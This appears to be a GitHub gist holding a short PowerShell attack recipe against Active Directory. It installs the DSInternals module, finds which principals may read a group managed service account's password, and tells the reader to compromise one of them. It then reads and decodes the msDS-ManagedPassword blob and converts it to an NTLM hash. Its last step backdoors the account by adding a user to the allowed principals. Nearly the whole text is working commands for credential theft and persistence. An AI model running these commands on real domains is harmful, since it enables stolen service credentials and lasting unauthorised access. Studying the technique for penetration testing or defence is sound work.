Skip to content

Instantly share code, notes, and snippets.

@NotMedic
Created January 15, 2020 14:04
Show Gist options
  • Save NotMedic/e098ddef056fcea4288051e7d78a4618 to your computer and use it in GitHub Desktop.
Save NotMedic/e098ddef056fcea4288051e7d78a4618 to your computer and use it in GitHub Desktop.
Group Managed Service Account Password Retrieval
#From: https://www.dsinternals.com/en/retrieving-cleartext-gmsa-passwords-from-active-directory/
#Install the DSInterals Powershell Module
Install-Module -Name DSInternals -Force
#Import it.
Import-Module DSInternals
#Identify which users can recover the GMSA Account's Password. Compromise one of those Principals.
Get-ADServiceAccount -Identity GMSAccount -Properties PrincipalsAllowedToRetrieveManagedPassword
#Get the GMSA Object and assign it to a variable
$gmsa = Get-ADServiceAccount -Identity GMSAccount -Properties 'msDS-ManagedPassword'
#Get the Managed Password data block into a Variable
$mp = $gmsa.'msDS-ManagedPassword'
#Decode the blob to Plain Text, but the password itself will likely be unreadable.
$pt = ConvertFrom-AdManagedPasswordBlob $mp
#Convert just the password to a NTLM Hash
ConvertTo-NTHash $pt.SecureCurrentPassword
#Backdoor the GMSA Account so you can get the password whenever.
Set-ADServiceAccount -Identity GMSAccount -PrincipalsAllowedToRetrieveManagedPassword USER1 -Add
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment